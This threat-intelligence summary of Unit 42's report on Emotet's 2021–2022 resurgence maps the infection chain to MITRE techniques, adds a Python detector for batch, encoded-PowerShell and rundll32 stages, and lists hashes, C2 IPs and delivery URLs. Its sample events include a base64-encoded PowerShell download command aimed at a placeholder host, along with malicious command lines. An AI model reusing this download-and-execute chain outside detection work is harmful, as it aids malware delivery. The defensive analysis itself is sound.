Emotet resurfaced in November 2021 after a law-enforcement takedown and by January 2022 had returned to prominence as an email-distributed threat with evolving delivery chains. The report covers infection patterns from November 2021 to January 2022, including macro-based Office documents, batch and PowerShell loaders, App Installer abuse, and encrypted C2 traffic, highlighting its persistence and evasion techniques. #Emotet #AppInstaller #Trickbot #CobaltStrike #TA542 #Mealybug
Keypoints
- Emotet rebounded in mid-November 2021 after a prior takedown and remained a top threat through January 2022.
- Infection chains include malicious Office documents with macros, thread hijacking, and the use of a batch file to drop loaders and PowerShell commands.
- Emotet began abusing Microsoft App Installer (and later .appinstaller/.appxbundle) to deliver its DLL payload, a method Microsoft later disabled.
- Persistent infections use registry updates and backdated DLL timestamps to maintain presence across reboots.
- C2 communications after revival shifted to encrypted HTTPS traffic with non-distinct certificate data, complicating detection.
- December 2021 saw Cobalt Strike deployed on infected hosts and increasingly varied infection templates, including HTML applications and Excel-driven payloads.
- January 2022 saw resumed spamming, personalized emails, and continued distribution of Emotet alongside loaded payloads (e.g., Cobalt Strike), with spambot activity often beginning within 35–45 minutes of infection.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – Emails distributing Emotet contain malicious attachments, or they contain links to malicious files. ‘Emails distributing Emotet contain malicious attachments, or they contain links to malicious files.’
- [T1566.002] Phishing – Spearphishing Link – Emails with links to malicious pages or files used to initiate infection. ‘Emails distributing Emotet contain malicious attachments, or they contain links to malicious files.’
- [T1059.001] Command-and-Scripting Interpreter – PowerShell – PowerShell command uses a base64-encoded string to retrieve and run the Emotet DLL. ‘The PowerShell command uses a base64-encoded string as shown.’
- [T1059.003] Command-and-Scripting Interpreter – Command Prompt – Batch file dropped by macro execution uses cmd.exe to run commands. ‘C:\WINDOWS\system32\cmd.exe /c c:\programdata\sdfhiuwu.bat’
- [T1027] Obfuscated/Compressed Files and Information – Obfuscated batch/script and base64 encoding to hide payloads. ‘obfuscated script in the batch file generates a PowerShell command to retrieve an Emotet DLL and run it… base64-encoded string.’
- [T1105] Ingress Tool Transfer – Downloading Emotet DLLs from multiple URLs for execution. ‘retrieve an Emotet DLL from one of seven URLs and save it to the C:\ProgramData directory.’
- [T1218.011] Signed Binary Proxy Execution – Rundll32 – Emotet DLL is run with rundll32.exe using a random entry point string. ‘The Emotet DLL is run with rundll32.exe using a random string of characters as the entry point.’
- [T1547.001] Boot or Logon Autostart Execution – Registry Run Keys/Startup Folder – Emotet persistence via a Windows Registry update and backdated DLL timestamp. ‘Emotet is made persistent through a Windows Registry update… backdated exactly one week prior to the infection.’
- [T1071.001] Web Protocols – Exfiltration/Command and Control over HTTPS – Post-revival C2 traffic is encrypted HTTPS, with certificate data observed in traffic. ‘certificate issuer data for Emotet C2 HTTPS traffic is…’
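The batch, encoded-PowerShell and rundll32 stages listed above can be spotted in process-creation telemetry. The following Python is an added example, not code from the Unit 42 report: it runs over constructed Sysmon-style events whose command lines follow the described chain; the event fields, the placeholder URL and the export name BaFvexaRoL are assumptions.

```python
import base64
import re
from typing import Dict, List, Optional

# Assumed PowerShell body for the constructed sample; the URL is a placeholder, not from the report.
_SAMPLE_PS = ("(New-Object Net.WebClient).DownloadFile('http://example.invalid/wp-admin/x/',"
              " 'C:\\ProgramData\\1245045870.dll')")
_SAMPLE_ENC = base64.b64encode(_SAMPLE_PS.encode("utf-16-le")).decode()

# Constructed process-creation events (Sysmon Event ID 1-like fields); the last one is benign.
EVENTS: List[Dict[str, str]] = [
    {"pid": "4100", "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r"C:\WINDOWS\system32\cmd.exe /c c:\programdata\sdfhiuwu.bat"},
    {"pid": "4120", "image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {_SAMPLE_ENC}"},
    {"pid": "4150", "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\1245045870.dll,BaFvexaRoL"},  # assumed random export
    {"pid": "4200", "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -e/-ec/-enc/-EncodedCommand argument (base64 of UTF-16LE), else ''."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def classify(event: Dict[str, str]) -> Optional[str]:
    """Map one event to a stage of the chain described above, or None if it matches nothing."""
    image, cmd = event["image"].lower(), event["cmdline"]
    if image.endswith("\\cmd.exe") and re.search(r"/c\s+\S*programdata\\[^\s]+\.bat", cmd, re.I):
        return "batch-loader"
    if image.endswith("\\powershell.exe"):
        script = decode_encoded_command(cmd)
        # Decoded body fetches from a URL and writes under ProgramData, as the report describes.
        if re.search(r"https?://", script, re.I) and "programdata" in script.lower():
            return "encoded-downloader"
    if image.endswith("\\rundll32.exe"):
        # DLL loaded from ProgramData with an explicit export; the export name itself is arbitrary.
        if re.search(r"programdata\\[^\s,]+\.dll\s*,\s*[A-Za-z0-9_#]+", cmd, re.I):
            return "rundll32-programdata"
    return None


def find_chain(events: List[Dict[str, str]]) -> Dict[str, str]:
    """Return {stage: pid}; all three stages on one host is a strong Emotet-style signal."""
    return {stage: e["pid"] for e in events if (stage := classify(e))}
```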
Indicators of Compromise
- [SHA256] – Epoch 4 password-protected ZIP archives and related documents – a1ab66a0fbb84a29e5c7733c42337bc733d8b3c11e2d9f9e4357f47fb337c4d5, 176cfa7f0742d5a79b9cfbf266c437b965fc763cf775415ca251c6bb2dd5e9e5, and 2 more hashes
- [URL] – Infected delivery URLs – hxxp://jamaateislami[.]com/wp-admin/FKyNiHeRz1/, hxxp://voltaicplasma[.]com/wp-includes/wkCYpDihyc8biTPn444B/
- [IP address] – C2/hosting servers – 51.178.61.60:443, 103.161.172.108:443, and 122.129.203.163:443
- [File name] – Malicious documents/spreadsheets – REP_1671971987654103376.xls, 8278500.xls, and 2 more
- [File path] – Infected DLLs and related artifacts – C:\ProgramData\1245045870.dll, C:\Users\[username]\AppData\Local\Tzbklmcfljkklzcncxkf.pgk
- [URL] – Additional infection resources – http://mustache.webstory[.]sa/wp-includes/cRwe2Pkxasj/, https://vdevigueta[.]com/wp-admin/qYOwD7kPD6JX/
Read more: https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/